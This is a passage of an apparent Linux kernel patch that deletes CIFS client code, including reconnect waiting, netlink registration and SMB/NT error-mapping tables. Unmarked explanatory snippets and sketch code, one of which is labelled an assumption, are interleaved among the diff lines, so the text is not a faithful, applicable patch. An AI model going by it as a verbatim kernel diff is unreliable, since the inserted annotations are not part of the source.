+-		/*
+-		 * XXX: we are not using dfs_cache_find() here because we might
+-		 * end up filling the entire DFS cache and thus potentially
+-		 * removing cached DFS targets that the client would eventually
+-		 * need during failover.
+-		 */
+-		if (ses->server->ops->get_dfs_refer &&
+-		    !ses->server->ops->get_dfs_refer(xid, ses, ref_path, &refs,
+-						     &num_refs, cifs_sb->local_nls,
+-						     cifs_remap(cifs_sb)))
+-			*islink = refs[0].server_type == DFS_TYPE_LINK;
+-		free_dfs_info_array(refs, num_refs);
+-		kfree(ref_path);
+-	}
+-	return 0;
+-}
+-#endif
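A hedged sketch of how a caller might use this helper after a QUERY_INFO request fails with STATUS_OBJECT_NAME_INVALID; the -EREMOTE remapping below is an assumption for illustration, standing in for whatever the real call sites do to make the VFS chase the DFS referral:

	bool islink;
	int rc2;

	rc2 = cifs_inval_name_dfs_link_error(xid, tcon, cifs_sb,
					     full_path, &islink);
	if (rc2)
		rc = rc2;	/* the referral lookup itself failed */
	else if (islink)
		rc = -EREMOTE;	/* assumed remap: treat as a DFS link */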
+-
+-int cifs_wait_for_server_reconnect(struct TCP_Server_Info *server, bool retry)
+-{
+-	int timeout = 10;
+-	int rc;
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus != CifsNeedReconnect) {
+-		spin_unlock(&server->srv_lock);
+-		return 0;
+-	}
+-	timeout *= server->nr_targets;
+-	spin_unlock(&server->srv_lock);
+-
+-	/*
+-	 * Give the demultiplex thread up to 10 seconds for each target
+-	 * available for reconnect -- this should be greater than the cifs
+-	 * socket timeout, which is 7 seconds.
+-	 *
+-	 * On "soft" mounts we wait once. Hard mounts keep retrying until the
+-	 * process is killed or the server comes back online.
+-	 */
+-	do {
+-		rc = wait_event_interruptible_timeout(server->response_q,
+-						      (server->tcpStatus != CifsNeedReconnect),
+-						      timeout * HZ);
+-		if (rc < 0) {
+-			cifs_dbg(FYI, "%s: aborting reconnect due to received signal\n",
+-				 __func__);
+-			return -ERESTARTSYS;
+-		}
+-
+-		/* are we still trying to reconnect? */
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus != CifsNeedReconnect) {
+-			spin_unlock(&server->srv_lock);
+-			return 0;
+-		}
+-		spin_unlock(&server->srv_lock);
+-	} while (retry);
+-
+-	cifs_dbg(FYI, "%s: gave up waiting on reconnect\n", __func__);
+-	return -EHOSTDOWN;
+-}
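A worked instance of the wait budget computed above: with server->nr_targets == 3 the per-iteration timeout is 10 * 3 = 30 seconds, comfortably above the 7-second socket timeout the comment mentions.

	int timeout = 10;	/* seconds per target */

	timeout *= 3;		/* e.g. server->nr_targets == 3 */
	/* wait_event_interruptible_timeout(..., timeout * HZ) then blocks
	 * for at most 30 seconds per loop iteration */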
+diff --git a/fs/cifs/netlink.c b/fs/cifs/netlink.c
+deleted file mode 100644
+index 147d9409252cd..0000000000000
+--- a/fs/cifs/netlink.c
++++ /dev/null
+@@ -1,90 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-/*
+- * Netlink routines for CIFS
+- *
+- * Copyright (c) 2020 Samuel Cabrero <scabrero@suse.de>
+- */
+-
+-#include <net/genetlink.h>
+-#include <uapi/linux/cifs/cifs_netlink.h>
+-
+-#include "netlink.h"
+-#include "cifsglob.h"
+-#include "cifs_debug.h"
+-#include "cifs_swn.h"
+-
+-static const struct nla_policy cifs_genl_policy[CIFS_GENL_ATTR_MAX + 1] = {
+-	[CIFS_GENL_ATTR_SWN_REGISTRATION_ID]	= { .type = NLA_U32 },
+-	[CIFS_GENL_ATTR_SWN_NET_NAME]		= { .type = NLA_STRING },
+-	[CIFS_GENL_ATTR_SWN_SHARE_NAME]		= { .type = NLA_STRING },
+-	[CIFS_GENL_ATTR_SWN_IP]			= { .len = sizeof(struct sockaddr_storage) },
+-	[CIFS_GENL_ATTR_SWN_NET_NAME_NOTIFY]	= { .type = NLA_FLAG },
+-	[CIFS_GENL_ATTR_SWN_SHARE_NAME_NOTIFY]	= { .type = NLA_FLAG },
+-	[CIFS_GENL_ATTR_SWN_IP_NOTIFY]		= { .type = NLA_FLAG },
+-	[CIFS_GENL_ATTR_SWN_KRB_AUTH]		= { .type = NLA_FLAG },
+-	[CIFS_GENL_ATTR_SWN_USER_NAME]		= { .type = NLA_STRING },
+-	[CIFS_GENL_ATTR_SWN_PASSWORD]		= { .type = NLA_STRING },
+-	[CIFS_GENL_ATTR_SWN_DOMAIN_NAME]	= { .type = NLA_STRING },
+-	[CIFS_GENL_ATTR_SWN_NOTIFICATION_TYPE]	= { .type = NLA_U32 },
+-	[CIFS_GENL_ATTR_SWN_RESOURCE_STATE]	= { .type = NLA_U32 },
+-	[CIFS_GENL_ATTR_SWN_RESOURCE_NAME]	= { .type = NLA_STRING},
+-};
+-
+-static const struct genl_ops cifs_genl_ops[] = {
+-	{
+-		.cmd = CIFS_GENL_CMD_SWN_NOTIFY,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = cifs_swn_notify,
+-	},
+-};
+-
+-static const struct genl_multicast_group cifs_genl_mcgrps[] = {
+-	[CIFS_GENL_MCGRP_SWN] = { .name = CIFS_GENL_MCGRP_SWN_NAME },
+-};
+-
+-struct genl_family cifs_genl_family = {
+-	.name		= CIFS_GENL_NAME,
+-	.version	= CIFS_GENL_VERSION,
+-	.hdrsize	= 0,
+-	.maxattr	= CIFS_GENL_ATTR_MAX,
+-	.module		= THIS_MODULE,
+-	.policy		= cifs_genl_policy,
+-	.ops		= cifs_genl_ops,
+-	.n_ops		= ARRAY_SIZE(cifs_genl_ops),
+-	.resv_start_op	= CIFS_GENL_CMD_SWN_NOTIFY + 1,
+-	.mcgrps		= cifs_genl_mcgrps,
+-	.n_mcgrps	= ARRAY_SIZE(cifs_genl_mcgrps),
+-};
+-
+-/**
+- * cifs_genl_init - Register generic netlink family
+- *
+- * Return zero if initialized successfully, otherwise non-zero.
+- */
+-int cifs_genl_init(void)
+-{
+-	int ret;
+-
+-	ret = genl_register_family(&cifs_genl_family);
+-	if (ret < 0) {
+-		cifs_dbg(VFS, "%s: failed to register netlink family\n",
+-				__func__);
+-		return ret;
+-	}
+-
+-	return 0;
+-}
+-
+-/**
+- * cifs_genl_exit - Unregister generic netlink family
+- */
+-void cifs_genl_exit(void)
+-{
+-	int ret;
+-
+-	ret = genl_unregister_family(&cifs_genl_family);
+-	if (ret < 0) {
+-		cifs_dbg(VFS, "%s: failed to unregister netlink family\n",
+-				__func__);
+-	}
+-}
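For context, a minimal sketch of how a registration pair like this is typically wired into module init/exit; the function names are hypothetical and not taken from the patch:

static int __init example_module_init(void)
{
	int rc;

	rc = cifs_genl_init();	/* register the SWN netlink family */
	if (rc)
		return rc;
	/* ... remaining module setup ... */
	return 0;
}

static void __exit example_module_exit(void)
{
	cifs_genl_exit();	/* unregister on module unload */
}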
+diff --git a/fs/cifs/netlink.h b/fs/cifs/netlink.h
+deleted file mode 100644
+index e2fa8ed24c546..0000000000000
+--- a/fs/cifs/netlink.h
++++ /dev/null
+@@ -1,16 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * Netlink routines for CIFS
+- *
+- * Copyright (c) 2020 Samuel Cabrero <scabrero@suse.de>
+- */
+-
+-#ifndef _CIFS_NETLINK_H
+-#define _CIFS_NETLINK_H
+-
+-extern struct genl_family cifs_genl_family;
+-
+-extern int cifs_genl_init(void);
+-extern void cifs_genl_exit(void);
+-
+-#endif /* _CIFS_NETLINK_H */
+diff --git a/fs/cifs/netmisc.c b/fs/cifs/netmisc.c
+deleted file mode 100644
+index 1b52e6ac431cb..0000000000000
+--- a/fs/cifs/netmisc.c
++++ /dev/null
+@@ -1,1021 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2002,2008
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- *   Error mapping routines from Samba libsmb/errormap.c
+- *   Copyright (C) Andrew Tridgell 2001
+- */
+-
+-#include <linux/net.h>
+-#include <linux/string.h>
+-#include <linux/in.h>
+-#include <linux/ctype.h>
+-#include <linux/fs.h>
+-#include <asm/div64.h>
+-#include <asm/byteorder.h>
+-#include <linux/inet.h>
+-#include "cifsfs.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "smberr.h"
+-#include "cifs_debug.h"
+-#include "nterr.h"
+-
+-struct smb_to_posix_error {
+-	__u16 smb_err;
+-	int posix_code;
+-};
+-
+-static const struct smb_to_posix_error mapping_table_ERRDOS[] = {
+-	{ERRbadfunc, -EINVAL},
+-	{ERRbadfile, -ENOENT},
+-	{ERRbadpath, -ENOTDIR},
+-	{ERRnofids, -EMFILE},
+-	{ERRnoaccess, -EACCES},
+-	{ERRbadfid, -EBADF},
+-	{ERRbadmcb, -EIO},
+-	{ERRnomem, -EREMOTEIO},
+-	{ERRbadmem, -EFAULT},
+-	{ERRbadenv, -EFAULT},
+-	{ERRbadformat, -EINVAL},
+-	{ERRbadaccess, -EACCES},
+-	{ERRbaddata, -EIO},
+-	{ERRbaddrive, -ENXIO},
+-	{ERRremcd, -EACCES},
+-	{ERRdiffdevice, -EXDEV},
+-	{ERRnofiles, -ENOENT},
+-	{ERRwriteprot, -EROFS},
+-	{ERRbadshare, -EBUSY},
+-	{ERRlock, -EACCES},
+-	{ERRunsup, -EINVAL},
+-	{ERRnosuchshare, -ENXIO},
+-	{ERRfilexists, -EEXIST},
+-	{ERRinvparm, -EINVAL},
+-	{ERRdiskfull, -ENOSPC},
+-	{ERRinvname, -ENOENT},
+-	{ERRinvlevel, -EOPNOTSUPP},
+-	{ERRdirnotempty, -ENOTEMPTY},
+-	{ERRnotlocked, -ENOLCK},
+-	{ERRcancelviolation, -ENOLCK},
+-	{ERRalreadyexists, -EEXIST},
+-	{ERRmoredata, -EOVERFLOW},
+-	{ERReasnotsupported, -EOPNOTSUPP},
+-	{ErrQuota, -EDQUOT},
+-	{ErrNotALink, -ENOLINK},
+-	{ERRnetlogonNotStarted, -ENOPROTOOPT},
+-	{ERRsymlink, -EOPNOTSUPP},
+-	{ErrTooManyLinks, -EMLINK},
+-	{0, 0}
+-};
+-
+-static const struct smb_to_posix_error mapping_table_ERRSRV[] = {
+-	{ERRerror, -EIO},
+-	{ERRbadpw, -EACCES},  /* was EPERM */
+-	{ERRbadtype, -EREMOTE},
+-	{ERRaccess, -EACCES},
+-	{ERRinvtid, -ENXIO},
+-	{ERRinvnetname, -ENXIO},
+-	{ERRinvdevice, -ENXIO},
+-	{ERRqfull, -ENOSPC},
+-	{ERRqtoobig, -ENOSPC},
+-	{ERRqeof, -EIO},
+-	{ERRinvpfid, -EBADF},
+-	{ERRsmbcmd, -EBADRQC},
+-	{ERRsrverror, -EIO},
+-	{ERRbadBID, -EIO},
+-	{ERRfilespecs, -EINVAL},
+-	{ERRbadLink, -EIO},
+-	{ERRbadpermits, -EINVAL},
+-	{ERRbadPID, -ESRCH},
+-	{ERRsetattrmode, -EINVAL},
+-	{ERRpaused, -EHOSTDOWN},
+-	{ERRmsgoff, -EHOSTDOWN},
+-	{ERRnoroom, -ENOSPC},
+-	{ERRrmuns, -EUSERS},
+-	{ERRtimeout, -ETIME},
+-	{ERRnoresource, -EREMOTEIO},
+-	{ERRtoomanyuids, -EUSERS},
+-	{ERRbaduid, -EACCES},
+-	{ERRusempx, -EIO},
+-	{ERRusestd, -EIO},
+-	{ERR_NOTIFY_ENUM_DIR, -ENOBUFS},
+-	{ERRnoSuchUser, -EACCES},
+-/*	{ERRaccountexpired, -EACCES},
+-	{ERRbadclient, -EACCES},
+-	{ERRbadLogonTime, -EACCES},
+-	{ERRpasswordExpired, -EACCES},*/
+-	{ERRaccountexpired, -EKEYEXPIRED},
+-	{ERRbadclient, -EACCES},
+-	{ERRbadLogonTime, -EACCES},
+-	{ERRpasswordExpired, -EKEYEXPIRED},
+-
+-	{ERRnosupport, -EINVAL},
+-	{0, 0}
+-};
+-
+-/*
+- * Convert a string containing a text IPv4 or IPv6 address to binary form.
+- *
+- * Returns 0 on failure.
+- */
+-static int
+-cifs_inet_pton(const int address_family, const char *cp, int len, void *dst)
+-{
+-	int ret = 0;
+-
+-	/* parsing stops at the first '\\' delimiter or the end of the string */
+-	if (address_family == AF_INET)
+-		ret = in4_pton(cp, len, dst, '\\', NULL);
+-	else if (address_family == AF_INET6)
+-		ret = in6_pton(cp, len, dst , '\\', NULL);
+-
+-	cifs_dbg(NOISY, "address conversion returned %d for %*.*s\n",
+-		 ret, len, len, cp);
+-	if (ret > 0)
+-		ret = 1;
+-	return ret;
+-}
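A short illustration of the '\\' delimiter passed to in4_pton()/in6_pton() above: it lets an address be parsed straight out of a UNC-style string without splitting it first (values hypothetical):

	__be32 addr;
	int ok;

	/* "192.168.0.5\share" is 17 bytes; parsing stops at the '\\' */
	ok = in4_pton("192.168.0.5\\share", 17, (u8 *)&addr, '\\', NULL);
	/* ok == 1 and addr holds 192.168.0.5 in network byte order */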
+-
+-/*
+- * Try to convert a string to an IPv4 address and then attempt to convert
+- * it to an IPv6 address if that fails. Set the family field if either
+- * succeeds. If it's an IPv6 address and it has a '%' sign in it, try to
+- * treat the part following it as a numeric sin6_scope_id.
+- *
+- * Returns 0 on failure.
+- */
+-int
+-cifs_convert_address(struct sockaddr *dst, const char *src, int len)
+-{
+-	int rc, alen, slen;
+-	const char *pct;
+-	char scope_id[13];
+-	struct sockaddr_in *s4 = (struct sockaddr_in *) dst;
+-	struct sockaddr_in6 *s6 = (struct sockaddr_in6 *) dst;
+-
+-	/* IPv4 address */
+-	if (cifs_inet_pton(AF_INET, src, len, &s4->sin_addr.s_addr)) {
+-		s4->sin_family = AF_INET;
+-		return 1;
+-	}
+-
+-	/* attempt to exclude the scope ID from the address part */
+-	pct = memchr(src, '%', len);
+-	alen = pct ? pct - src : len;
+-
+-	rc = cifs_inet_pton(AF_INET6, src, alen, &s6->sin6_addr.s6_addr);
+-	if (!rc)
+-		return rc;
+-
+-	s6->sin6_family = AF_INET6;
+-	if (pct) {
+-		/* grab the scope ID */
+-		slen = len - (alen + 1);
+-		if (slen <= 0 || slen > 12)
+-			return 0;
+-		memcpy(scope_id, pct + 1, slen);
+-		scope_id[slen] = '\0';
+-
+-		rc = kstrtouint(scope_id, 0, &s6->sin6_scope_id);
+-		rc = (rc == 0) ? 1 : 0;
+-	}
+-
+-	return rc;
+-}
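A worked example of the scope-ID branch above: for the input "fe80::1%2" the '%' splits the string, in6_pton() parses "fe80::1", and kstrtouint() stores 2 in sin6_scope_id.

	struct sockaddr_storage ss = {};
	struct sockaddr_in6 *s6 = (struct sockaddr_in6 *)&ss;
	const char *src = "fe80::1%2";

	if (cifs_convert_address((struct sockaddr *)&ss, src, strlen(src))) {
		/* s6->sin6_family == AF_INET6, s6->sin6_scope_id == 2 */
	}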
+-
+-void
+-cifs_set_port(struct sockaddr *addr, const unsigned short int port)
+-{
+-	switch (addr->sa_family) {
+-	case AF_INET:
+-		((struct sockaddr_in *)addr)->sin_port = htons(port);
+-		break;
+-	case AF_INET6:
+-		((struct sockaddr_in6 *)addr)->sin6_port = htons(port);
+-		break;
+-	}
+-}
+-
+-/*****************************************************************************
+-convert an NT status code to a dos class/code
+- *****************************************************************************/
+-/* NT status -> dos error map */
+-static const struct {
+-	__u8 dos_class;
+-	__u16 dos_code;
+-	__u32 ntstatus;
+-} ntstatus_to_dos_map[] = {
+-	{
+-	ERRDOS, ERRgeneral, NT_STATUS_UNSUCCESSFUL}, {
+-	ERRDOS, ERRbadfunc, NT_STATUS_NOT_IMPLEMENTED}, {
+-	ERRDOS, ERRinvlevel, NT_STATUS_INVALID_INFO_CLASS}, {
+-	ERRDOS, 24, NT_STATUS_INFO_LENGTH_MISMATCH}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ACCESS_VIOLATION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_IN_PAGE_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PAGEFILE_QUOTA}, {
+-	ERRDOS, ERRbadfid, NT_STATUS_INVALID_HANDLE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_INITIAL_STACK}, {
+-	ERRDOS, 193, NT_STATUS_BAD_INITIAL_PC}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_CID}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_TIMER_NOT_CANCELED}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER}, {
+-	ERRDOS, ERRbadfile, NT_STATUS_NO_SUCH_DEVICE}, {
+-	ERRDOS, ERRbadfile, NT_STATUS_NO_SUCH_FILE}, {
+-	ERRDOS, ERRbadfunc, NT_STATUS_INVALID_DEVICE_REQUEST}, {
+-	ERRDOS, 38, NT_STATUS_END_OF_FILE}, {
+-	ERRDOS, 34, NT_STATUS_WRONG_VOLUME}, {
+-	ERRDOS, 21, NT_STATUS_NO_MEDIA_IN_DEVICE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNRECOGNIZED_MEDIA}, {
+-	ERRDOS, 27, NT_STATUS_NONEXISTENT_SECTOR},
+-/*	{ This NT error code was 'squashed'
+-	 from NT_STATUS_MORE_PROCESSING_REQUIRED to NT_STATUS_OK
+-	 during the session setup } */
+-	{
+-	ERRDOS, ERRnomem, NT_STATUS_NO_MEMORY}, {
+-	ERRDOS, 487, NT_STATUS_CONFLICTING_ADDRESSES}, {
+-	ERRDOS, 487, NT_STATUS_NOT_MAPPED_VIEW}, {
+-	ERRDOS, 87, NT_STATUS_UNABLE_TO_FREE_VM}, {
+-	ERRDOS, 87, NT_STATUS_UNABLE_TO_DELETE_SECTION}, {
+-	ERRDOS, 2142, NT_STATUS_INVALID_SYSTEM_SERVICE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ILLEGAL_INSTRUCTION}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_INVALID_LOCK_SEQUENCE}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_INVALID_VIEW_SIZE}, {
+-	ERRDOS, 193, NT_STATUS_INVALID_FILE_FOR_SECTION}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_ALREADY_COMMITTED},
+-/*	{ This NT error code was 'squashed'
+-	 from NT_STATUS_ACCESS_DENIED to NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE
+-	 during the session setup }   */
+-	{
+-	ERRDOS, ERRnoaccess, NT_STATUS_ACCESS_DENIED}, {
+-	ERRDOS, 111, NT_STATUS_BUFFER_TOO_SMALL}, {
+-	ERRDOS, ERRbadfid, NT_STATUS_OBJECT_TYPE_MISMATCH}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NONCONTINUABLE_EXCEPTION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_DISPOSITION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNWIND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_STACK}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_UNWIND_TARGET}, {
+-	ERRDOS, 158, NT_STATUS_NOT_LOCKED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PARITY_ERROR}, {
+-	ERRDOS, 487, NT_STATUS_UNABLE_TO_DECOMMIT_VM}, {
+-	ERRDOS, 487, NT_STATUS_NOT_COMMITTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_PORT_ATTRIBUTES}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PORT_MESSAGE_TOO_LONG}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_MIX}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_QUOTA_LOWER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DISK_CORRUPT_ERROR}, {
+-	 /* mapping changed since shell does lookup on * and expects FileNotFound */
+-	ERRDOS, ERRbadfile, NT_STATUS_OBJECT_NAME_INVALID}, {
+-	ERRDOS, ERRbadfile, NT_STATUS_OBJECT_NAME_NOT_FOUND}, {
+-	ERRDOS, ERRalreadyexists, NT_STATUS_OBJECT_NAME_COLLISION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_HANDLE_NOT_WAITABLE}, {
+-	ERRDOS, ERRbadfid, NT_STATUS_PORT_DISCONNECTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DEVICE_ALREADY_ATTACHED}, {
+-	ERRDOS, 161, NT_STATUS_OBJECT_PATH_INVALID}, {
+-	ERRDOS, ERRbadpath, NT_STATUS_OBJECT_PATH_NOT_FOUND}, {
+-	ERRDOS, 161, NT_STATUS_OBJECT_PATH_SYNTAX_BAD}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DATA_OVERRUN}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DATA_LATE_ERROR}, {
+-	ERRDOS, 23, NT_STATUS_DATA_ERROR}, {
+-	ERRDOS, 23, NT_STATUS_CRC_ERROR}, {
+-	ERRDOS, ERRnomem, NT_STATUS_SECTION_TOO_BIG}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_PORT_CONNECTION_REFUSED}, {
+-	ERRDOS, ERRbadfid, NT_STATUS_INVALID_PORT_HANDLE}, {
+-	ERRDOS, ERRbadshare, NT_STATUS_SHARING_VIOLATION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_QUOTA_EXCEEDED}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PAGE_PROTECTION}, {
+-	ERRDOS, 288, NT_STATUS_MUTANT_NOT_OWNED}, {
+-	ERRDOS, 298, NT_STATUS_SEMAPHORE_LIMIT_EXCEEDED}, {
+-	ERRDOS, 87, NT_STATUS_PORT_ALREADY_SET}, {
+-	ERRDOS, 87, NT_STATUS_SECTION_NOT_IMAGE}, {
+-	ERRDOS, 156, NT_STATUS_SUSPEND_COUNT_EXCEEDED}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_THREAD_IS_TERMINATING}, {
+-	ERRDOS, 87, NT_STATUS_BAD_WORKING_SET_LIMIT}, {
+-	ERRDOS, 87, NT_STATUS_INCOMPATIBLE_FILE_MAP}, {
+-	ERRDOS, 87, NT_STATUS_SECTION_PROTECTION}, {
+-	ERRDOS, ERReasnotsupported, NT_STATUS_EAS_NOT_SUPPORTED}, {
+-	ERRDOS, 255, NT_STATUS_EA_TOO_LARGE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NONEXISTENT_EA_ENTRY}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_EAS_ON_FILE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_EA_CORRUPT_ERROR}, {
+-	ERRDOS, ERRlock, NT_STATUS_FILE_LOCK_CONFLICT}, {
+-	ERRDOS, ERRlock, NT_STATUS_LOCK_NOT_GRANTED}, {
+-	ERRDOS, ERRbadfile, NT_STATUS_DELETE_PENDING}, {
+-	ERRDOS, ERRunsup, NT_STATUS_CTL_FILE_NOT_SUPPORTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNKNOWN_REVISION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_REVISION_MISMATCH}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_OWNER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_PRIMARY_GROUP}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_IMPERSONATION_TOKEN}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CANT_DISABLE_MANDATORY}, {
+-	ERRDOS, 2215, NT_STATUS_NO_LOGON_SERVERS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_LOGON_SESSION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_PRIVILEGE}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_PRIVILEGE_NOT_HELD}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_ACCOUNT_NAME}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_USER_EXISTS},
+-/*	{ This NT error code was 'squashed'
+-	 from NT_STATUS_NO_SUCH_USER to NT_STATUS_LOGON_FAILURE
+-	 during the session setup } */
+-	{
+-	ERRDOS, ERRnoaccess, NT_STATUS_NO_SUCH_USER}, { /* could map to 2238 */
+-	ERRHRD, ERRgeneral, NT_STATUS_GROUP_EXISTS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_GROUP}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MEMBER_IN_GROUP}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MEMBER_NOT_IN_GROUP}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LAST_ADMIN},
+-/*	{ This NT error code was 'squashed'
+-	 from NT_STATUS_WRONG_PASSWORD to NT_STATUS_LOGON_FAILURE
+-	 during the session setup } */
+-	{
+-	ERRSRV, ERRbadpw, NT_STATUS_WRONG_PASSWORD}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ILL_FORMED_PASSWORD}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PASSWORD_RESTRICTION}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_LOGON_FAILURE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ACCOUNT_RESTRICTION}, {
+-	ERRSRV, ERRbadLogonTime, NT_STATUS_INVALID_LOGON_HOURS}, {
+-	ERRSRV, ERRbadclient, NT_STATUS_INVALID_WORKSTATION}, {
+-	ERRSRV, ERRpasswordExpired, NT_STATUS_PASSWORD_EXPIRED}, {
+-	ERRSRV, ERRaccountexpired, NT_STATUS_ACCOUNT_DISABLED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NONE_MAPPED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_TOO_MANY_LUIDS_REQUESTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LUIDS_EXHAUSTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_SUB_AUTHORITY}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_ACL}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_SID}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_SECURITY_DESCR}, {
+-	ERRDOS, 127, NT_STATUS_PROCEDURE_NOT_FOUND}, {
+-	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_FORMAT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_TOKEN}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_INHERITANCE_ACL}, {
+-	ERRDOS, 158, NT_STATUS_RANGE_NOT_LOCKED}, {
+-	ERRDOS, 112, NT_STATUS_DISK_FULL}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_SERVER_DISABLED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_SERVER_NOT_DISABLED}, {
+-	ERRDOS, 68, NT_STATUS_TOO_MANY_GUIDS_REQUESTED}, {
+-	ERRDOS, 259, NT_STATUS_GUIDS_EXHAUSTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_ID_AUTHORITY}, {
+-	ERRDOS, 259, NT_STATUS_AGENTS_EXHAUSTED}, {
+-	ERRDOS, 154, NT_STATUS_INVALID_VOLUME_LABEL}, {
+-	ERRDOS, 14, NT_STATUS_SECTION_NOT_EXTENDED}, {
+-	ERRDOS, 487, NT_STATUS_NOT_MAPPED_DATA}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_RESOURCE_DATA_NOT_FOUND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_RESOURCE_TYPE_NOT_FOUND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_RESOURCE_NAME_NOT_FOUND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ARRAY_BOUNDS_EXCEEDED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_DENORMAL_OPERAND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_DIVIDE_BY_ZERO}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_INEXACT_RESULT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_INVALID_OPERATION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_OVERFLOW}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_STACK_CHECK}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_UNDERFLOW}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INTEGER_DIVIDE_BY_ZERO}, {
+-	ERRDOS, 534, NT_STATUS_INTEGER_OVERFLOW}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PRIVILEGED_INSTRUCTION}, {
+-	ERRDOS, ERRnomem, NT_STATUS_TOO_MANY_PAGING_FILES}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FILE_INVALID}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ALLOTTED_SPACE_EXCEEDED},
+-/*	{ This NT error code was 'squashed'
+-	 from NT_STATUS_INSUFFICIENT_RESOURCES to
+-	 NT_STATUS_INSUFF_SERVER_RESOURCES during the session setup } */
+-	{
+-	ERRDOS, ERRnoresource, NT_STATUS_INSUFFICIENT_RESOURCES}, {
+-	ERRDOS, ERRbadpath, NT_STATUS_DFS_EXIT_PATH_FOUND}, {
+-	ERRDOS, 23, NT_STATUS_DEVICE_DATA_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DEVICE_NOT_CONNECTED}, {
+-	ERRDOS, 21, NT_STATUS_DEVICE_POWER_FAILURE}, {
+-	ERRDOS, 487, NT_STATUS_FREE_VM_NOT_AT_BASE}, {
